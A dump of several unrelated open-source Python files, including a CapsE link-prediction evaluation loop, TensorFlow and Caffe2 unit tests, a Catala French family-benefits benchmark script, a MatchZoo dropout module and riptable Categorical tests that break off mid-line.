filter_size=args.filter_size, num_filters=args.num_filters, vocab_size=len(words_indexes), iter_routing=args.iter_routing, batch_size=2 * args.batch_size, num_outputs_secondCaps=args.num_outputs_secondCaps, vec_len_secondCaps=args.vec_len_secondCaps, useConstantInit=args.useConstantInit ) # Output directory for models and summaries lstModelNames = list(args.model_name.split(",")) for _model_name in lstModelNames: out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE", _model_name)) print("Evaluating {}\n".format(out_dir)) # Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints")) checkpoint_prefix = os.path.join(checkpoint_dir, "model") lstModelIndexes = list(args.model_index.split(",")) for _model_index in lstModelIndexes: _file = checkpoint_prefix + "-" + _model_index capse.saver.restore(sess, _file) print("Loaded model", _file) # Predict function to predict scores for test data def predict(x_batch, y_batch, writer=None): feed_dict = { capse.input_x: x_batch, capse.input_y: y_batch } scores = sess.run([capse.predictions], feed_dict) return scores def test_prediction(x_batch, y_batch, head_or_tail='head'): hits10 = 0.0 mrr = 0.0 mr = 0.0 hits1 = 0.0 for i in range(len(x_batch)): new_x_batch = np.tile(x_batch[i], (len(entity2id), 1)) new_y_batch = np.tile(y_batch[i], (len(entity2id), 1)) if head_or_tail == 'head': new_x_batch[:, 0] = entity_array else: # 'tail' new_x_batch[:, 2] = entity_array lstIdx = [] for tmpIdxTriple in range(len(new_x_batch)): tmpTriple = (new_x_batch[tmpIdxTriple][0], new_x_batch[tmpIdxTriple][1], new_x_batch[tmpIdxTriple][2]) if (tmpTriple in train) or (tmpTriple in valid) or ( tmpTriple in test): # also remove the valid test triple lstIdx.append(tmpIdxTriple) new_x_batch = np.delete(new_x_batch, lstIdx, axis=0) new_y_batch = np.delete(new_y_batch, lstIdx, axis=0) # thus, insert the valid test triple again, to the beginning of the array new_x_batch = np.insert(new_x_batch, 0, x_batch[i], axis=0) # thus, the index of the valid test triple is equal to 0 new_y_batch = np.insert(new_y_batch, 0, y_batch[i], axis=0) # for running with a batch size while len(new_x_batch) % ((int(args.neg_ratio) + 1) * args.batch_size) != 0: new_x_batch = np.append(new_x_batch, [x_batch[i]], axis=0) new_y_batch = np.append(new_y_batch, [y_batch[i]], axis=0) results = [] listIndexes = range(0, len(new_x_batch), (int(args.neg_ratio) + 1) * args.batch_size) for tmpIndex in range(len(listIndexes) - 1): results = np.append(results, predict( new_x_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]], new_y_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]])) results = np.append(results, predict(new_x_batch[listIndexes[-1]:], new_y_batch[listIndexes[-1]:])) results = np.reshape(results, -1) results_with_id = rankdata(results, method='ordinal') _filter = results_with_id[0] mr += _filter mrr += 1.0 / _filter if _filter <= 10: hits10 += 1 if _filter == 1: hits1 += 1 return np.array([mr, mrr, hits1, hits10]) if args.testIdx < (args.num_splits - 1): head_results = test_prediction( x_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)], y_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)], head_or_tail='head') tail_results = test_prediction( x_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)], y_test[batch_test * args.testIdx: batch_test * (args.testIdx + 1)], head_or_tail='tail') else: head_results = test_prediction(x_test[batch_test * args.testIdx: len_test], y_test[batch_test * args.testIdx: len_test], head_or_tail='head') tail_results = test_prediction(x_test[batch_test * args.testIdx: len_test], y_test[batch_test * args.testIdx: len_test], head_or_tail='tail') wri = open(_file + '.eval.' + str(args.testIdx) + '.txt', 'w') for _val in head_results: wri.write(str(_val) + ' ') wri.write('\n') for _val in tail_results: wri.write(str(_val) + ' ') wri.write('\n') wri.close()
seq2seq/test/pooling_encoder_test.py
soupstandstop/test
6,053
12687158
<reponame>soupstandstop/test # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Test Cases for PoolingEncoder. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import tensorflow as tf import numpy as np from seq2seq.encoders import PoolingEncoder class PoolingEncoderTest(tf.test.TestCase): """ Tests the PoolingEncoder class. """ def setUp(self): super(PoolingEncoderTest, self).setUp() self.batch_size = 4 self.sequence_length = 16 self.input_depth = 10 self.mode = tf.contrib.learn.ModeKeys.TRAIN def _test_with_params(self, params): """Tests the encoder with a given parameter configuration""" inputs = tf.random_normal( [self.batch_size, self.sequence_length, self.input_depth]) example_length = tf.ones( self.batch_size, dtype=tf.int32) * self.sequence_length encode_fn = PoolingEncoder(params, self.mode) encoder_output = encode_fn(inputs, example_length) with self.test_session() as sess: sess.run(tf.global_variables_initializer()) encoder_output_ = sess.run(encoder_output) np.testing.assert_array_equal( encoder_output_.outputs.shape, [self.batch_size, self.sequence_length, self.input_depth]) np.testing.assert_array_equal( encoder_output_.attention_values.shape, [self.batch_size, self.sequence_length, self.input_depth]) np.testing.assert_array_equal(encoder_output_.final_state.shape, [self.batch_size, self.input_depth]) def test_encode_with_pos(self): self._test_with_params({ "position_embeddings.enable": True, "position_embeddings.num_positions": self.sequence_length }) def test_encode_without_pos(self): self._test_with_params({ "position_embeddings.enable": False, "position_embeddings.num_positions": 0 }) if __name__ == "__main__": tf.test.main()
french_law/python/main.py
edwintorok/catala
792
12687171
<filename>french_law/python/main.py #!python3 from datetime import date from src.allocations_familiales import PriseEnCharge_Code, Collectivite_Code from src.api import allocations_familiales, Enfant from src.catala import LogEvent, LogEventCode, reset_log, retrieve_log import timeit import argparse from typing import List, Any from termcolor import colored def call_allocations_familiales() -> float: return allocations_familiales( date_courante=date(2020, 4, 20), enfants=[ Enfant(id=0, remuneration_mensuelle=0, date_de_naissance=date(2003, 2, 2), prise_en_charge=PriseEnCharge_Code.EffectiveEtPermanente, a_deja_ouvert_droit_aux_allocations_familiales=True), Enfant(id=1, remuneration_mensuelle=300, date_de_naissance=date(2013, 9, 30), prise_en_charge=PriseEnCharge_Code.GardeAlterneePartageAllocations, a_deja_ouvert_droit_aux_allocations_familiales=True) ], ressources_menage=30000, residence=Collectivite_Code.Metropole, personne_charge_effective_permanente_est_parent=True, personne_charge_effective_permanente_remplit_titre_I=True, ) def benchmark_iteration(): money_given = call_allocations_familiales() assert (money_given == 99.37) def run_with_log() -> List[LogEvent]: money_given = call_allocations_familiales() assert (money_given == 99.37) log = retrieve_log() reset_log() return log def print_value(v: Any) -> str: if isinstance(v, list): return "[" + ",".join([str(x) for x in v]) + "]" else: return str(v) if __name__ == '__main__': parser = argparse.ArgumentParser( description='French law library in Python') parser.add_argument('action', metavar='ACTION', type=str, nargs=1, help="'bench' or 'show_log'") args = parser.parse_args() action = args.action[0] if action == "bench": iterations = 10000 print("Iterating {} iterations of the family benefits computation. Total time (s):".format( iterations)) print(timeit.timeit(benchmark_iteration, number=iterations)) elif action == "show_log": log = run_with_log() indentation = 0 for log_event in log: if log_event.code == LogEventCode.BeginCall: print("{}{} {}".format( "".ljust(indentation), colored("Begin call:", "yellow"), colored(" >> ".join(log_event.payload), "magenta"))) # type: ignore indentation += 2 elif log_event.code == LogEventCode.EndCall: indentation -= 2 print("{}{} {}".format( "".ljust(indentation), colored("End call:", "yellow"), colored(" >> ".join(log_event.payload), "magenta"))) # type: ignore elif log_event.code == LogEventCode.VariableDefinition: headings, value = log_event.payload # type: ignore print("{}{} {} {} {}".format( "".ljust(indentation), colored("Variable definition:", "blue"), colored(" >> ".join(headings), "magenta"), colored(":=", "blue"), colored(print_value(value), "green"))) # type: ignore elif log_event.code == LogEventCode.DecisionTaken: print("{}{} {}".format( "".ljust(indentation), colored("Decision taken:", "green"), colored("{}".format(log_event.payload), "magenta"))) # type: ignore else: print("Action '{}' not recognized!".format(action)) exit(-1)
matchzoo/modules/dropout.py
ChrisRBXiong/MatchZoo-py
468
12687208
<gh_stars>100-1000 import torch.nn as nn class RNNDropout(nn.Dropout): """Dropout for RNN.""" def forward(self, sequences_batch): """Masking whole hidden vector for tokens.""" # B: batch size # L: sequence length # D: hidden size # sequence_batch: BxLxD ones = sequences_batch.data.new_ones(sequences_batch.shape[0], sequences_batch.shape[-1]) dropout_mask = nn.functional.dropout(ones, self.p, self.training, inplace=False) return dropout_mask.unsqueeze(1) * sequences_batch
caffe2/python/operator_test/lars_test.py
Hacky-DH/pytorch
60,067
12687218
<filename>caffe2/python/operator_test/lars_test.py from caffe2.python import core from hypothesis import given import caffe2.python.hypothesis_test_util as hu import hypothesis.strategies as st import numpy as np class TestLars(hu.HypothesisTestCase): @given(offset=st.floats(min_value=0, max_value=100), lr_min=st.floats(min_value=1e-8, max_value=1e-6), **hu.gcs) def test_lars(self, offset, lr_min, dc, gc): X = np.random.rand(6, 7, 8, 9).astype(np.float32) dX = np.random.rand(6, 7, 8, 9).astype(np.float32) wd = np.array([1e-4]).astype(np.float32) trust = np.random.rand(1).astype(np.float32) lr_max = np.random.rand(1).astype(np.float32) def ref_lars(X, dX, wd, trust, lr_max): rescale_factor = \ trust / (np.linalg.norm(dX) / np.linalg.norm(X) + wd + offset) rescale_factor = np.minimum(rescale_factor, lr_max) rescale_factor = np.maximum(rescale_factor, lr_min) return [rescale_factor] op = core.CreateOperator( "Lars", ["X", "dX", "wd", "trust", "lr_max"], ["rescale_factor"], offset=offset, lr_min=lr_min, ) self.assertReferenceChecks( device_option=gc, op=op, inputs=[X, dX, wd, trust, lr_max], reference=ref_lars )
waliki/search/search_indexes.py
luzik/waliki
324
12687231
<reponame>luzik/waliki from waliki.models import Page from haystack import indexes class PageIndex(indexes.SearchIndex, indexes.Indexable): text = indexes.CharField(document=True, use_template=True) def get_model(self): return Page
riptable/tests/test_categorical.py
rtosholdings/riptable
307
12687233
import pytest import os import pandas as pd import riptable as rt from enum import IntEnum from numpy.testing import assert_array_equal from riptable import * from riptable import save_sds, load_sds from riptable import FastArray, Categorical, CatZero from riptable.rt_categorical import Categories from riptable.rt_enum import ( INVALID_DICT, ) from riptable.rt_enum import ( DisplayLength, DisplayJustification, DisplayColumnColors, ) from riptable.rt_enum import CategoryMode, TypeRegister from riptable.rt_numpy import isnan, isnotnan, arange, ones from riptable.tests.test_utils import ( get_categorical_data_factory_method, get_all_categorical_data, ) from riptable.rt_sds import SDSMakeDirsOn from riptable.tests.utils import LikertDecision # change to true since we write into /tests directory SDSMakeDirsOn() three_unicode = np.array(["AAPL\u2080", "AMZN\u2082", "IBM\u2081"]) three_bytes = FastArray([b'a', b'b', b'c']) three_ints = FastArray([1, 2, 3]) compare_func_names = ['__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__'] int_success = [ np.array([True, False, True]), # ne np.array([False, True, False]), # eq np.array([False, True, True]), # ge np.array([False, False, True]), # gt np.array([True, True, False]), # le np.array([True, False, False]), # lt ] same_success = [ np.array([False, False, False]), # ne np.array([True, True, True]), # eq np.array([True, True, True]), # ge np.array([False, False, False]), # gt np.array([True, True, True]), # le np.array([False, False, False]), # lt ] diff_success = [ np.array([True, False, True]), # ne np.array([False, True, False]), # eq np.array([False, True, False]), # ge np.array([False, False, False]), # gt np.array([True, True, True]), # le np.array([True, False, True]), # lt ] ShowCompareInfo = False list_bytes = [b'b', b'b', b'a', b'd', b'c'] list_unicode = ['b', 'b', 'a', 'd', 'c'] list_true_unicode = [u'b\u2082', u'b\u2082', u'a\u2082', u'd\u2082', u'c\u2082'] decision_dict = dict(zip(LikertDecision.__members__.keys(), [int(v) for v in LikertDecision.__members__.values()],)) def array_equal(arr1, arr2): subr = arr1 - arr2 sumr = sum(subr == 0) result = sumr == len(arr1) if not result: print("array comparison failed", arr1, arr2) return result class TestCategorical: def _notimpl(self): pytest.skip("This test needs to be implemented.") def test_constructor(self): # from pandas categorical # from single parameter # from two parameters # ndarray # python list self._notimpl() def test_ctor_list(self): c_bytes = Categorical(list_bytes) assert c_bytes.dtype == np.int8, f"Dtype {c_bytes.dtype} was not correct for construction from small list." assert len(c_bytes) == 5, f"Length of underlying index array was incorrect for construction from bytes." unique_bytes = np.unique(list_bytes) assert np.all( c_bytes._categories_wrap._list == unique_bytes ), f"Categories did not generate a unique list of categories from input bytes list." c_unicode = Categorical(list_unicode) assert c_unicode.dtype == np.int8, f"Dtype {c_unicode.dtype} was not correct for construction from small list." assert len(c_unicode) == 5, f"Length of underlying index array was incorrect for construction from unicode." assert ( len(c_unicode._categories_wrap) == 4 ), f"Length of unique categories was incorrect for construction from unicode." assert ( c_unicode._categories_wrap._list[0] == b'a' ), f"Unique categories were not sorted for construction from unicode." assert c_unicode._categories_wrap._list.dtype.char == 'S', f"Unicode strings were not flipped to byte strings." c_true_unicode = Categorical(list_true_unicode) assert ( c_true_unicode.dtype == np.int8 ), f"Dtype {c_true_unicode.dtype} was not correct for construction from small list." assert ( len(c_true_unicode) == 5 ), f"Length of underlying index array was incorrect for construction from true unicode." assert ( len(c_true_unicode._categories_wrap) == 4 ), f"Length of unique categories was incorrect for construction from true unicode." assert ( c_true_unicode._categories_wrap._list[0] == u'a\u2082' ), f"Unique categories were not sorted for construction from true unicode." assert ( c_true_unicode._categories_wrap._list.dtype.char == 'U' ), f"Unicode strings were not flipped to byte strings." def test_ctor_nparray(self): c_bytes = Categorical(np.array(list_bytes)) assert c_bytes.dtype == np.int8, f"Dtype {c_bytes.dtype} was not correct for construction from small list." assert len(c_bytes) == 5, f"Length of underlying index array was incorrect for construction from bytes." unique_bytes = np.unique(list_bytes) assert np.all( c_bytes._categories_wrap._list == unique_bytes ), f"Categories did not generate a unique list of categories from input bytes list." c_unicode = Categorical(np.array(list_unicode)) assert c_unicode.dtype == np.int8, f"Dtype {c_unicode.dtype} was not correct for construction from small list." assert len(c_unicode) == 5, f"Length of underlying index array was incorrect for construction from unicode." assert ( len(c_unicode._categories_wrap._list) == 4 ), f"Length of unique categories was incorrect for construction from unicode." assert ( c_unicode._categories_wrap._list[0] == b'a' ), f"Unique categories were not sorted for construction from unicode." assert c_unicode._categories_wrap._list.dtype.char == 'S', f"Unicode strings were not flipped to byte strings." c_true_unicode = Categorical(np.array(list_true_unicode)) assert ( c_true_unicode.dtype == np.int8 ), f"Dtype {c_true_unicode.dtype} was not correct for construction from small list." assert ( len(c_true_unicode) == 5 ), f"Length of underlying index array was incorrect for construction from true unicode." assert ( len(c_true_unicode._categories_wrap._list) == 4 ), f"Length of unique categories was incorrect for construction from true unicode." assert ( c_true_unicode._categories_wrap._list[0] == u'a\u2082' ), f"Unique categories were not sorted for construction from true unicode." assert ( c_true_unicode._categories_wrap._list.dtype.char == 'U' ), f"Unicode strings were not flipped to byte strings." def test_ctor_values_and_cats(self): v_bytes = [b'IBM', b'AAPL', b'AMZN', b'IBM', b'hello'] v_str = ['IBM', 'AAPL', 'AMZN', 'IBM', 'hello'] v_true = [ u'IBM\u2082', u'AAPL\u2082', u'AMZN\u2082', u'IBM\u2082', u'hello\u2082', ] c_bytes = [b'AAPL', b'AMZN', b'IBM'] c_str = ['AAPL', 'AMZN', 'IBM'] c_true = [u'AAPL\u2082', u'AMZN\u2082', u'IBM\u2082'] v_correct = [2, 0, 1, 2, 3] c_correct = [b'AAPL', b'AMZN', b'IBM', b'inv'] valid_v = [ v_bytes, v_str, np.array(v_bytes), np.array(v_str), FastArray(v_bytes), FastArray(v_str), ] valid_c = [ c_bytes, c_str, np.array(c_bytes), np.array(c_str), FastArray(c_bytes), FastArray(c_str), ] for v in valid_v: vdt = None if hasattr(v, 'dtype'): vdt = v.dtype else: vdt = type(v) for c in valid_c: cdt = None if hasattr(c, 'dtype'): cdt = c.dtype else: cdt = type(c) # error if no invalid provided with pytest.raises(ValueError): cat = Categorical(v, c) # accept invalid and correctly assign # cat = Categorical(v, c, invalid_category=b'inv') # self.assertEqual(cat._categories.dtype.char, 'S', msg=f"Categorical from v: {vdt} and c: {cdt} did not flip categories to bytestring") # v_is_correct = bool(np.all(v_correct == cat.view(FastArray))) # self.assertTrue(v_is_correct, msg=f"Did not create the correct underlying index array from v: {vdt} and c: {cdt}") # c_is_correct = bool(np.all(c_correct == cat._categories)) # self.assertTrue(c_is_correct, msg=f"Did not create the correct categories from v: {vdt} and c: {cdt}") # v = v_true # vdt = "TRUE unicode" # for c in valid_c: # if hasattr(c,'dtype'): # cdt = c.dtype # else: # cdt = type(c) # cat = Categorical(v,c) # --------------------------------------------------------------------------- def test_ctor_bad_index(self): idx_list = [1, 2, 3, 4, 5] str_list = ['a', 'b'] with pytest.raises(ValueError): c = Categorical(idx_list, str_list) # --------------------------------------------------------------------------- def test_ctor_non_unique(self): ''' riptable categoricals, like pandas categoricals, do not allow a non-unique list of categories when an index array is provided. ''' idx_list = [0, 1] str_list = ['b', 'b', 'a'] c = Categorical(idx_list, str_list) # --------------------------------------------------------------------------- def test_ctor_enum(self): codes = [1, 44, 44, 133, 75] c = Categorical(codes, LikertDecision) # --------------------------------------------------------------------------- def test_compare_enum_int(self): compare_func_names = [ '__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__', ] codes = [1, 44, 44, 133, 75] valid_idx = 44 bad_idx = 43 valid_idx_correct = [ FastArray([True, False, False, True, True]), FastArray([False, True, True, False, False]), FastArray([False, True, True, True, True]), FastArray([False, False, False, True, True]), FastArray([True, True, True, False, False]), FastArray([True, False, False, False, False]), ] bad_idx_correct = [ FastArray([True, True, True, True, True]), FastArray([False, False, False, False, False]), FastArray([False, True, True, True, True]), FastArray([False, True, True, True, True]), FastArray([True, False, False, False, False]), FastArray([True, False, False, False, False]), ] for d in (LikertDecision, decision_dict): c = Categorical(codes, d) # test valid integer code for name, correct in zip(compare_func_names, valid_idx_correct): func = c.__getattribute__(name) result = func(valid_idx) was_correct = bool(np.all(correct == result)) assert ( was_correct ), f"Categorical enum comparison failed with good integer index on {name} operation. {c.view(FastArray)} code: {valid_idx}" # test invalid integer code for name, correct in zip(compare_func_names, bad_idx_correct): func = c.__getattribute__(name) result = func(bad_idx) was_correct = bool(np.all(correct == result)) assert was_correct, f"Categorical enum comparison failed with good integer index on {name} operation" # --------------------------------------------------------------------------- def test_compare_enum_str(self): compare_func_names = [ '__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__', ] codes = [1, 44, 44, 133, 75] valid_idx = 'StronglyAgree' bad_idx = 'x' valid_idx_correct = [ FastArray([True, False, False, True, True]), FastArray([False, True, True, False, False]), FastArray([False, True, True, True, True]), FastArray([False, False, False, True, True]), FastArray([True, True, True, False, False]), FastArray([True, False, False, False, False]), ] for d in (LikertDecision, decision_dict): c = Categorical(codes, d) # test valid category string for name, correct in zip(compare_func_names, valid_idx_correct): func = c.__getattribute__(name) result = func(valid_idx) was_correct = bool(np.all(correct == result)) assert was_correct, f"Categorical enum comparison failed with good category string on {name} operation" # test invalid category string for name in compare_func_names: func = c.__getattribute__(name) with pytest.raises(ValueError): result = func(bad_idx) def test_map(self): c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False) mapping = {'a': 'AA', 'b': 'BB', 'c': 'CC', 'd': 'DD'} result = c.map(mapping) correct = FastArray([b'BB', b'BB', b'CC', b'AA', b'DD']) assert bool(np.all(result == correct)) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0) result = c.map(mapping) assert bool(np.all(result == correct)) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False) mapping = {'a': 'AA', 'b': 'BB', 'c': 'CC'} result = c.map(mapping, invalid='INVALID') correct = FastArray([b'BB', b'BB', b'CC', b'AA', b'INVALID']) assert bool(np.all(result == correct)) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0) result = c.map(mapping, invalid='INVALID') assert bool(np.all(result == correct)) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False) mapping = {'a': 1.0, 'b': 2.0, 'c': 3.0} result = c.map(mapping, invalid=666) correct = FastArray([2.0, 2.0, 3.0, 1.0, 666.0]) assert bool(np.all(result == correct)) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0) result = c.map(mapping, invalid=666) assert bool(np.all(result == correct)) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False) result = c.map(mapping) assert np.isnan(result[4]) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0) result = c.map(mapping) assert np.isnan(result[4]) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False) mapping = FastArray(['w', 'x', 'y', 'z']) result = c.map(mapping) correct = FastArray([b'w', b'w', b'x', b'y', b'z']) assert bool(np.all(result == correct)) c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0) result = c.map(mapping) assert bool(np.all(result == correct)) c = Categorical([2, 2, 3, 1, 4, 0], ['a', 'b', 'c', 'd']) mapping = {'a': 1.0, 'b': 2.0, 'c': 3.0} result = c.map(mapping, invalid=666) correct = FastArray([2.0, 2.0, 3.0, 1.0, 666.0, 666.0]) assert bool(np.all(result == correct)) # --------------------------------------------------------------------------- def test_from_category(self): c = Categorical(['a', 'a', 'b', 'c', 'a']) bin = c.from_category('a') assert bin == 1 c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0) bin = c.from_category(b'a') assert bin == 0 with pytest.raises(ValueError): bin = c.from_category('z') c = Categorical(np.arange(5, 10)) bin = c.from_category(5) assert bin == 1 with pytest.raises(ValueError): bin = c.from_category(100) c = Categorical([FastArray(['a', 'b', 'c']), np.arange(3)]) bin = c.from_category(('c', 2)) assert bin == 3 # --------------------------------------------------------------------------- def test_getitem_enum_int(self): codes = [1, 44, 44, 133, 75] correct_strings = [ 'StronglyDisagree', 'StronglyAgree', 'StronglyAgree', 'Agree', 'Disagree', ] c = Categorical(codes, LikertDecision) # getitem good init for idx in range(5): assert correct_strings[idx] == c[idx], f"Failed to return correct string for valid index in categorical." # getitem bad init with pytest.raises(IndexError): result = c[5] # --------------------------------------------------------------------------- def test_getitem_enum_int_list(self): codes = [1, 44, 44, 133, 75] correct_strings = [ 'StronglyDisagree', 'StronglyAgree', 'StronglyAgree', 'Agree', 'Disagree', ] c = Categorical(codes, LikertDecision) result = c[[1, 4]] assert isinstance( result, Categorical ), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead." assert result[0] == 'StronglyAgree' assert result[1] == 'Disagree' result = c[np.array([1, 4])] assert isinstance( result, Categorical ), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead." assert result[0] == 'StronglyAgree' assert result[1] == 'Disagree' result = c[FastArray([1, 4])] assert isinstance( result, Categorical ), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead." assert result[0] == 'StronglyAgree' assert result[1] == 'Disagree' def test_getitem_enum(self): self._notimpl() def test_setitem_enum(self): self._notimpl() # -------------------------------------------- MATLAB ---------------------------------- def test_ctor_matlab(self): idx_list = [1.0, 2.0, 3.0, 4.0, 5.0] str_list = ['a', 'b', 'c', 'd', 'e'] with pytest.raises(TypeError): c = Categorical(idx_list, str_list) c = Categorical(idx_list, str_list, from_matlab=True) assert c[0] == 'a' assert c.dtype == np.dtype(np.int8) # def test_ctor_matlab_non_unique(self): # idx_list = [1.0, 2.0, 3.0, 4.0, 5.0] # str_list = ['a','b','c','d','d'] # with self.assertRaises(ValueError, msg=f"Failed to raise error when MATLab categories were not unique."): # c = Categorical(idx_list, str_list, from_matlab=True) # ------------------------------- PANDAS CATEGORICAL ---------------------------------- def test_ctor_pandas_cat(self): idx_list = [0, 1, 2, 3, 4] str_list = ['a', 'b', 'c', 'd', 'e'] pd_c = pd.Categorical.from_codes(idx_list, str_list) pd_c = Categorical(pd_c) rt_c = Categorical(idx_list, str_list) cats_match = bool(np.all(pd_c.category_array == rt_c.category_array)) assert cats_match, f"Failed to create matching categories from pandas categorical" # idx_match = bool(np.all(pd_c.view(np.ndarray)+1 == rt_c.view(np.ndarray))) # self.assertTrue(idx_match, msg=f"Failed to create matching unerlying array from pandas categorical") # convert pandas invalid bytes pd_c = pd.Categorical.from_codes([-1, 0, 1, 2], ['a', 'b', 'c']) pd_c = Categorical(pd_c) cat_list = pd_c.category_array assert len(cat_list) == 3 no_negative = bool(np.all(pd_c.view(FastArray) >= 0)) assert no_negative # convert pandas invalid unicode pd_c = pd.Categorical.from_codes([-1, 0, 1, 2], [u'\u2082', u'\u2083', u'\u2084']) pd_c = Categorical(pd_c) cat_list = pd_c.category_array assert len(cat_list) == 3 no_negative = bool(np.all(pd_c.view(FastArray) >= 0)) assert no_negative # --------------------------------RIPTABLE CATEGORICAL ---------------------------------------- # def test_ctor_rt_cat(self): # c_unicode = Categorical(list_unicode) # c = c_unicode.copy(forceunicode=True) # self.assertEqual(c._categories_wrap._list.dtype.char, 'U', msg=f"Failed to force unicode on categorical copy.") # ------------------------------------CUSTOM CATEGORIES ---------------------------------- def test_ctor_list_unique(self): unique_str = ['a', 'b', 'c', 'd', 'e', 'f'] str_list = ['a', 'b', 'c', 'd', 'e'] c = Categorical(str_list, unique_str) cats_match = bool(np.all(c._categories_wrap._list == unique_str)) assert cats_match, f"Failed to create matching categories from unique category input." # ------------------------------------INTEGER ARRAY ---------------------------------- def test_ctor_integer_array(self): lis = [1, 4, 9, 16, 25] c = Categorical(lis) for v1, v2 in zip(c, lis): assert v1 == v2 # ------------------------------------GARBAGE ---------------------------------- def test_ctor_garbage(self): with pytest.raises(TypeError): c = Categorical(1, 2) # ------------------------------------TEST FORCE DTYPE ---------------------------------- def test_init_with_dtype(self): int_types = [np.int8, np.int16, np.int32, np.int64] float_types = [np.float32, np.float64] uint_types = [np.uint8, np.uint16, np.uint32, np.uint64] arr = ['a', 'b', 'c', 'd', 'e'] for dt in int_types: c = Categorical(arr, dtype=dt) assert c.dtype == dt, f"Failed to force the correct dtype {dt} for categorical." for dt in float_types + uint_types: with pytest.raises(TypeError): c = Categorical(arr, dtype=dt) # ------------------------------------TEST CONVERT VALUE------------------------------------- def test_possibly_convert_value(self): ''' TODO: fix for new Categories class ''' self._notimpl() def test_categories_bad_init(self): tup = ('a', 'b', 'c') with pytest.raises(TypeError): cat = Categories(tup) def test_categories_len(self): cats_from_list = Categorical(['a', 'b', 'c'], ordered=True, base_index=1, filter=None)._categories_wrap assert len(cats_from_list) == 3 cats_from_enum = Categorical(FastArray([144]), LikertDecision)._categories_wrap assert len(cats_from_enum) == 144 def test_get_categories(self): c_list = [ 'StronglyAgree', 'Agree', 'Disagree', 'StronglyDisagree', 'NeitherAgreeNorDisagree', ] cats_from_list = Categories(c_list, unicode=True) cats_from_enum = Categories(LikertDecision) get_cats_match = bool(np.all(cats_from_list.get_categories() == cats_from_enum.get_categories())) assert get_cats_match def test_possibly_add_categories(self): self._notimpl() # uniquify and sort # raise exception for adding cats to intenum, etc. def test_categories_preserves_subtype(self): # Test the Categorical.categories() method preserves the array type for the category data. # This is important because we want the array(s) returned by this method to have the same type # as the internal data (i.e. what's returned by Categorical.category_array or Categorical.category_dict). # Single-key Categorical dates = rt.Date( [ '2019-03-15', '2019-04-18', '2019-05-17', '2019-06-21', '2019-07-19', '2019-08-16', '2019-09-20', '2019-10-18', '2019-11-15', '2019-12-20', ] ) dates.name = 'dates' dates_cat = rt.Cat(dates) cats = dates_cat.categories() assert type(dates) == type(cats) # Multi-key Categorical datestrs = rt.FA( [ '2019-03-15', '2019-04-18', '2019-05-17', '2019-06-21', '2019-07-19', '2019-08-16', '2019-09-20', '2019-10-18', '2019-11-15', '2019-12-20', ] ) datestrs.name = 'datestrs' mcat = rt.Cat([dates, datestrs]) mcats = mcat.categories() assert type(mcats['key_0']) == type(dates) assert type(mcats['key_1']) == type(datestrs) # Empty single-key Categorical dates = rt.Date([]) dates_cat = rt.Cat(dates) cats = dates_cat.categories() assert type(dates) == type(cats) def test_make_unique(self): # SJK: changed this test on 8/21/2018 - count now comes from the grouping object, not Categories.make unique values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b']) # c = Categories([],base_index=1) # index, cat_len, filter = c.make_unique(values) cat = Categorical(values, ordered=True, base_index=1, filter=None) index = cat._fa c = cat._categories_wrap assert len(index) == 7 assert max(index) == 4 assert c._mode == CategoryMode.StringArray assert c._list.dtype.char == 'S' assert c.isbytes univals = values.astype('U') cat = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True) index = cat._fa c = cat._categories_wrap assert len(index) == 7 assert max(index) == 4 assert c._mode == CategoryMode.StringArray assert c._list.dtype.char == 'U' assert c.isunicode @pytest.mark.xfail( reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.' ) def test_force_base_index(self): filter = FastArray([True, True, False, False, True]) c = Categorical(['a', 'a', 'b', 'c', 'a']) assert c.base_index == 1, 'Did not default base index to 1' assert c._fa[0] == 1, 'Did not default base index to 1' c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0) assert c.base_index == 0, 'Did not force base index to 0' assert c._fa[0] == 0, 'Did not force base index to 0' c = Categorical(['a', 'a', 'b', 'c', 'a'], filter=filter) assert len(c.category_array) == 1 assert c._fa[2] == 0, 'Did not default base index to 1' c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0, filter=filter) assert len(c.category_array) == 1 assert c._fa[2] == INVALID_DICT[c.dtype.num], 'Did not force base index to 0' with pytest.raises(ValueError): c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=99, filter=filter) c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c']) assert c.base_index == 1, 'Did not default base index to 1' assert c._fa[0] == 1, 'Did not default base index to 1' c = 